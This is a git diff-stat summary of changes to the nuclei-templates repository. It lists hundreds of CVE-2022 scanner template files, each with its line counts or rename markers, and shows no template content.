+- nuclei-templates/CVE-2022/CVE-2022-0867.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-0869.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-0870.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-0885.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-0899.yaml | 8 +- ...{CVE-2022-0954.yaml => CVE-2022-0921.yaml} | 0 nuclei-templates/CVE-2022/CVE-2022-0928.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0948.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-0949.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-0952.yaml | 47 + nuclei-templates/CVE-2022/CVE-2022-0963.yaml | 64 + nuclei-templates/CVE-2022/CVE-2022-0968.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-1007.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-1013.yaml | 16 +- nuclei-templates/CVE-2022/CVE-2022-1040.yaml | 48 - nuclei-templates/CVE-2022/CVE-2022-1054.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-1057.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-1058.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-1162.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-1168.yaml | 20 
+- nuclei-templates/CVE-2022/CVE-2022-1170.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-1221.yaml | 14 +- nuclei-templates/CVE-2022/CVE-2022-1281.yaml | 41 +- nuclei-templates/CVE-2022/CVE-2022-1329.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-1386.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-1390.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-1391.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-1392.yaml | 38 - nuclei-templates/CVE-2022/CVE-2022-1398.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-1439.yaml | 40 - nuclei-templates/CVE-2022/CVE-2022-1442.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-1574.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-1595.yaml | 37 +- nuclei-templates/CVE-2022/CVE-2022-1597.yaml | 36 +- nuclei-templates/CVE-2022/CVE-2022-1724.yaml | 41 - nuclei-templates/CVE-2022/CVE-2022-1756.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-1768.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-1883.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-1903.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-1904.yaml | 35 + nuclei-templates/CVE-2022/CVE-2022-1906.yaml | 39 + nuclei-templates/CVE-2022/CVE-2022-1910.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-1916.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-1933.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-1937.yaml | 31 +- nuclei-templates/CVE-2022/CVE-2022-1946.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-1952.yaml | 41 +- nuclei-templates/CVE-2022/CVE-2022-2034.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-21371.yaml | 50 - nuclei-templates/CVE-2022/CVE-2022-21500.yaml | 51 - nuclei-templates/CVE-2022/CVE-2022-21587.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-21661.yaml | 50 + nuclei-templates/CVE-2022/CVE-2022-21705.yaml | 94 + nuclei-templates/CVE-2022/CVE-2022-2174.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-2185.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-2187.yaml | 36 + nuclei-templates/CVE-2022/CVE-2022-2219.yaml | 11 +- 
nuclei-templates/CVE-2022/CVE-2022-22242.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-22733.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-22897.yaml | 39 +- nuclei-templates/CVE-2022/CVE-2022-22947.yaml | 97 +- nuclei-templates/CVE-2022/CVE-2022-22954.yaml | 32 +- nuclei-templates/CVE-2022/CVE-2022-22963.yaml | 56 + nuclei-templates/CVE-2022/CVE-2022-22972.yaml | 106 - nuclei-templates/CVE-2022/CVE-2022-23102.yaml | 45 +- nuclei-templates/CVE-2022/CVE-2022-2314.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-23348.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-23544.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-2373.yaml | 34 +- nuclei-templates/CVE-2022/CVE-2022-2376.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-2379.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-23808.yaml | 49 - nuclei-templates/CVE-2022/CVE-2022-2383.yaml | 35 +- nuclei-templates/CVE-2022/CVE-2022-23854.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-23881.yaml | 35 - nuclei-templates/CVE-2022/CVE-2022-23898.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-23944.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-24124.yaml | 50 + nuclei-templates/CVE-2022/CVE-2022-24129.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-2414.yaml | 68 + nuclei-templates/CVE-2022/CVE-2022-24181.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-24223.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-24264.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-24265.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-24266.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-24288.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-24384.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-2446.yaml | 59 + nuclei-templates/CVE-2022/CVE-2022-2462.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-24627.yaml | 31 +- nuclei-templates/CVE-2022/CVE-2022-2467.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-24681.yaml | 51 - nuclei-templates/CVE-2022/CVE-2022-24706.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-24716.yaml | 10 +- 
nuclei-templates/CVE-2022/CVE-2022-24816.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-24856.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-2486.yaml | 15 +- nuclei-templates/CVE-2022/CVE-2022-2487.yaml | 29 +- nuclei-templates/CVE-2022/CVE-2022-2488.yaml | 41 - nuclei-templates/CVE-2022/CVE-2022-24899.yaml | 42 - nuclei-templates/CVE-2022/CVE-2022-24900.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-25082.yaml | 29 +- nuclei-templates/CVE-2022/CVE-2022-25125.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-25148.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-25149.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-25323.yaml | 35 - nuclei-templates/CVE-2022/CVE-2022-2535.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-25356.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-25369.yaml | 16 +- nuclei-templates/CVE-2022/CVE-2022-2544.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-2546.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-25481.yaml | 35 +- nuclei-templates/CVE-2022/CVE-2022-25485.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-25486.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-25487.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-25488.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-25489.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-25497.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-2551.yaml | 30 +- nuclei-templates/CVE-2022/CVE-2022-25568.yaml | 51 + nuclei-templates/CVE-2022/CVE-2022-2599.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-26135.yaml | 28 + nuclei-templates/CVE-2022/CVE-2022-26148.yaml | 44 +- nuclei-templates/CVE-2022/CVE-2022-26159.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-26233.yaml | 37 - nuclei-templates/CVE-2022/CVE-2022-26263.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-2627.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-2633.yaml | 52 + nuclei-templates/CVE-2022/CVE-2022-26352.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-26564.yaml | 13 +- nuclei-templates/CVE-2022/CVE-2022-26833.yaml | 15 +- 
nuclei-templates/CVE-2022/CVE-2022-26960.yaml | 40 - nuclei-templates/CVE-2022/CVE-2022-2733.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-2756.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-27593.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-27849.yaml | 58 + nuclei-templates/CVE-2022/CVE-2022-27926.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-27927.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-27984.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-27985.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-28022.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-28023.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-28032.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-28079.yaml | 45 - nuclei-templates/CVE-2022/CVE-2022-28117.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-28219.yaml | 58 - nuclei-templates/CVE-2022/CVE-2022-28290.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-2863.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-28923.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-28955.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-29004.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-29005.yaml | 35 +- nuclei-templates/CVE-2022/CVE-2022-29006.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-29007.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-29009.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-29013.yaml | 52 + nuclei-templates/CVE-2022/CVE-2022-29014.yaml | 38 - nuclei-templates/CVE-2022/CVE-2022-29078.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-29153.yaml | 37 +- nuclei-templates/CVE-2022/CVE-2022-29272.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-29298.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-29301.yaml | 42 - nuclei-templates/CVE-2022/CVE-2022-29303.yaml | 42 - nuclei-templates/CVE-2022/CVE-2022-29349.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-29383.yaml | 42 + nuclei-templates/CVE-2022/CVE-2022-29455.yaml | 47 + nuclei-templates/CVE-2022/CVE-2022-29464.yaml | 44 + nuclei-templates/CVE-2022/CVE-2022-29548.yaml | 34 +- 
nuclei-templates/CVE-2022/CVE-2022-29775.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-30073.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-30489.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-30512.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-30513.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-30514.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-30525.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-3062.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-30777.yaml | 46 - nuclei-templates/CVE-2022/CVE-2022-31126.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-31137.yaml | 34 - nuclei-templates/CVE-2022/CVE-2022-31268.yaml | 48 - nuclei-templates/CVE-2022/CVE-2022-31269.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-31299.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-31373.yaml | 13 +- nuclei-templates/CVE-2022/CVE-2022-3142.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-31474.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-31499.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-31656.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-31793.yaml | 40 - nuclei-templates/CVE-2022/CVE-2022-31798.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-31814.yaml | 32 +- nuclei-templates/CVE-2022/CVE-2022-31845.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-31846.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-31847.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-31854.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-31879.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31974.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31975.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31976.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31977.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31978.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31980.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31981.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31982.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31983.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-31984.yaml | 10 +- 
nuclei-templates/CVE-2022/CVE-2022-32015.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-32018.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-32024.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-32026.yaml | 47 + nuclei-templates/CVE-2022/CVE-2022-32028.yaml | 14 +- nuclei-templates/CVE-2022/CVE-2022-32094.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-32195.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-32409.yaml | 38 - nuclei-templates/CVE-2022/CVE-2022-3242.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-32429.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-32430.yaml | 61 + nuclei-templates/CVE-2022/CVE-2022-32770.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-32771.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-32772.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-33119.yaml | 29 +- nuclei-templates/CVE-2022/CVE-2022-33891.yaml | 30 +- nuclei-templates/CVE-2022/CVE-2022-33901.yaml | 35 +- nuclei-templates/CVE-2022/CVE-2022-33965.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-34045.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-34046.yaml | 32 +- nuclei-templates/CVE-2022/CVE-2022-34048.yaml | 15 +- nuclei-templates/CVE-2022/CVE-2022-34093.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-34094.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-34121.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-34265.yaml | 45 - nuclei-templates/CVE-2022/CVE-2022-34328.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-34576.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-34590.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-34753.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-3484.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-3506.yaml | 29 +- nuclei-templates/CVE-2022/CVE-2022-35151.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-35405.yaml | 38 +- nuclei-templates/CVE-2022/CVE-2022-35413.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-35493.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-35653.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-3578.yaml | 26 +- 
nuclei-templates/CVE-2022/CVE-2022-35914.yaml | 25 +- nuclei-templates/CVE-2022/CVE-2022-36446.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-36537.yaml | 33 +- nuclei-templates/CVE-2022/CVE-2022-36553.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-36642.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-36804.yaml | 57 +- nuclei-templates/CVE-2022/CVE-2022-36883.yaml | 27 + nuclei-templates/CVE-2022/CVE-2022-37042.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-37153.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-37190.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-37191.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-37299.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-3768.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-3800.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-38295.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-38296.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-38463.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-38467.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-38553.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-38637.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-38794.yaml | 18 +- nuclei-templates/CVE-2022/CVE-2022-38817.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-38870.yaml | 18 +- nuclei-templates/CVE-2022/CVE-2022-39048.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-3908.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-39195.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-3933.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-3934.yaml | 13 +- nuclei-templates/CVE-2022/CVE-2022-3980.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-3982.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-39952.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-39960.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-39986.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-40022.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-40032.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-40047.yaml | 4 +- nuclei-templates/CVE-2022/CVE-2022-40083.yaml | 23 +- 
nuclei-templates/CVE-2022/CVE-2022-40127.yaml | 39 +- nuclei-templates/CVE-2022/CVE-2022-40359.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-4049.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-4050.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-4057.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-4059.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-4060.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-4063.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-40734.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-40843.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-40879.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-40881.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-41040.yaml | 41 - nuclei-templates/CVE-2022/CVE-2022-4117.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-4140.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-41412.yaml | 14 +- nuclei-templates/CVE-2022/CVE-2022-41441.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-41473.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-41840.yaml | 30 +- nuclei-templates/CVE-2022/CVE-2022-42094.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-42095.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-42096.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-42233.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-4260.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-42746.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-42747.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-42748.yaml | 20 +- nuclei-templates/CVE-2022/CVE-2022-42749.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-4295.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-4301.yaml | 13 +- nuclei-templates/CVE-2022/CVE-2022-43014.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-43015.yaml | 22 +- nuclei-templates/CVE-2022/CVE-2022-43016.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-43017.yaml | 19 +- nuclei-templates/CVE-2022/CVE-2022-43018.yaml | 18 +- nuclei-templates/CVE-2022/CVE-2022-4305.yaml | 9 +- nuclei-templates/CVE-2022/CVE-2022-4306.yaml | 13 +- 
nuclei-templates/CVE-2022/CVE-2022-43140.yaml | 17 +- nuclei-templates/CVE-2022/CVE-2022-43164.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43165.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43166.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43167.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43169.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43170.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-43185.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-4320.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-4321.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-4325.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-4328.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-43769.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-44290.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44291.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-4447.yaml | 23 +- nuclei-templates/CVE-2022/CVE-2022-44877.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-44944.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-44946.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-44947.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-44948.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44949.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44950.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44951.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44952.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-44957.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-45037.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-45038.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-45354.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-45362.yaml | 27 +- nuclei-templates/CVE-2022/CVE-2022-45365.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-45805.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-45835.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-45917.yaml | 28 +- nuclei-templates/CVE-2022/CVE-2022-45933.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-46020.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-46071.yaml | 22 +- 
nuclei-templates/CVE-2022/CVE-2022-46073.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-46169.yaml | 38 +- nuclei-templates/CVE-2022/CVE-2022-46381.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-46443.yaml | 31 +- nuclei-templates/CVE-2022/CVE-2022-46463.yaml | 26 +- nuclei-templates/CVE-2022/CVE-2022-46888.yaml | 6 +- nuclei-templates/CVE-2022/CVE-2022-46934.yaml | 24 +- nuclei-templates/CVE-2022/CVE-2022-47002.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-47003.yaml | 12 +- nuclei-templates/CVE-2022/CVE-2022-47075.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-47615.yaml | 11 +- nuclei-templates/CVE-2022/CVE-2022-47945.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-47966.yaml | 21 +- nuclei-templates/CVE-2022/CVE-2022-47986.yaml | 33 +- nuclei-templates/CVE-2022/CVE-2022-48012.yaml | 8 +- nuclei-templates/CVE-2022/CVE-2022-48165.yaml | 10 +- nuclei-templates/CVE-2022/CVE-2022-48197.yaml | 29 +- nuclei-templates/CVE-2022/CVE-2022-4897.yaml | 8 +- nuclei-templates/CVE-2022/cve-2022-0140.yaml | 56 + nuclei-templates/CVE-2022/cve-2022-0148.yaml | 62 + nuclei-templates/CVE-2022/cve-2022-0149.yaml | 49 - nuclei-templates/CVE-2022/cve-2022-0165.yaml | 29 - ...{CVE-2022-0201.yaml => cve-2022-0201.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-0208.yaml | 27 +- nuclei-templates/CVE-2022/cve-2022-0271.yaml | 54 + nuclei-templates/CVE-2022/cve-2022-0281.yaml | 51 + nuclei-templates/CVE-2022/cve-2022-0346.yaml | 23 +- nuclei-templates/CVE-2022/cve-2022-0381.yaml | 37 - nuclei-templates/CVE-2022/cve-2022-0422.yaml | 50 - ...{CVE-2022-0432.yaml => cve-2022-0432.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-0437.yaml | 61 + nuclei-templates/CVE-2022/cve-2022-0540.yaml | 19 +- nuclei-templates/CVE-2022/cve-2022-0591.yaml | 44 +- nuclei-templates/CVE-2022/cve-2022-0594.yaml | 56 + nuclei-templates/CVE-2022/cve-2022-0595.yaml | 23 +- nuclei-templates/CVE-2022/cve-2022-0599.yaml | 48 - nuclei-templates/CVE-2022/cve-2022-0653.yaml | 53 + 
nuclei-templates/CVE-2022/cve-2022-0656.yaml | 54 + nuclei-templates/CVE-2022/cve-2022-0660.yaml | 29 +- nuclei-templates/CVE-2022/cve-2022-0952.yaml | 52 - nuclei-templates/CVE-2022/cve-2022-0963.yaml | 71 - ...{CVE-2022-1020.yaml => cve-2022-1020.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-1040.yaml | 58 + nuclei-templates/CVE-2022/cve-2022-1119.yaml | 21 +- nuclei-templates/CVE-2022/cve-2022-1392.yaml | 49 + nuclei-templates/CVE-2022/cve-2022-1439.yaml | 50 + nuclei-templates/CVE-2022/cve-2022-1598.yaml | 29 +- ...{CVE-2022-1609.yaml => cve-2022-1609.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-1713.yaml | 18 +- nuclei-templates/CVE-2022/cve-2022-1724.yaml | 69 + nuclei-templates/CVE-2022/cve-2022-1815.yaml | 26 +- nuclei-templates/CVE-2022/cve-2022-1904.yaml | 42 - nuclei-templates/CVE-2022/cve-2022-1906.yaml | 45 - nuclei-templates/CVE-2022/cve-2022-21371.yaml | 64 + nuclei-templates/CVE-2022/cve-2022-21500.yaml | 56 + nuclei-templates/CVE-2022/cve-2022-21705.yaml | 109 - nuclei-templates/CVE-2022/cve-2022-2187.yaml | 43 - ...VE-2022-22536.yaml => cve-2022-22536.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-2290.yaml | 22 +- nuclei-templates/CVE-2022/cve-2022-22963.yaml | 38 - nuclei-templates/CVE-2022/cve-2022-22972.yaml | 113 + nuclei-templates/CVE-2022/cve-2022-23134.yaml | 33 +- ...VE-2022-23178.yaml => cve-2022-23178.yaml} | 0 ...VE-2022-23347.yaml => cve-2022-23347.yaml} | 0 ...VE-2022-23779.yaml => cve-2022-23779.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-23808.yaml | 60 + nuclei-templates/CVE-2022/cve-2022-23881.yaml | 49 + ...VE-2022-24112.yaml => cve-2022-24112.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-24124.yaml | 41 - ...VE-2022-24260.yaml => cve-2022-24260.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-24681.yaml | 62 + nuclei-templates/CVE-2022/cve-2022-2488.yaml | 51 + nuclei-templates/CVE-2022/cve-2022-24899.yaml | 51 + ...VE-2022-24990.yaml => cve-2022-24990.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-25216.yaml | 26 +- 
nuclei-templates/CVE-2022/cve-2022-25323.yaml | 52 + ...VE-2022-26134.yaml => cve-2022-26134.yaml} | 0 nuclei-templates/CVE-2022/cve-2022-26135.yaml | 32 - nuclei-templates/CVE-2022/cve-2022-26138.yaml | 21 +- nuclei-templates/CVE-2022/cve-2022-26233.yaml | 46 + nuclei-templates/CVE-2022/cve-2022-26960.yaml | 50 + nuclei-templates/CVE-2022/cve-2022-27849.yaml | 46 - nuclei-templates/CVE-2022/cve-2022-28079.yaml | 54 + nuclei-templates/CVE-2022/cve-2022-28080.yaml | 22 +- nuclei-templates/CVE-2022/cve-2022-28219.yaml | 67 + nuclei-templates/CVE-2022/cve-2022-28363.yaml | 34 +- nuclei-templates/CVE-2022/cve-2022-28365.yaml | 27 +- nuclei-templates/CVE-2022/cve-2022-29014.yaml | 49 + nuclei-templates/CVE-2022/cve-2022-29299.yaml | 16 +- nuclei-templates/CVE-2022/cve-2022-29301.yaml | 48 + nuclei-templates/CVE-2022/cve-2022-29303.yaml | 58 + nuclei-templates/CVE-2022/cve-2022-29383.yaml | 46 - 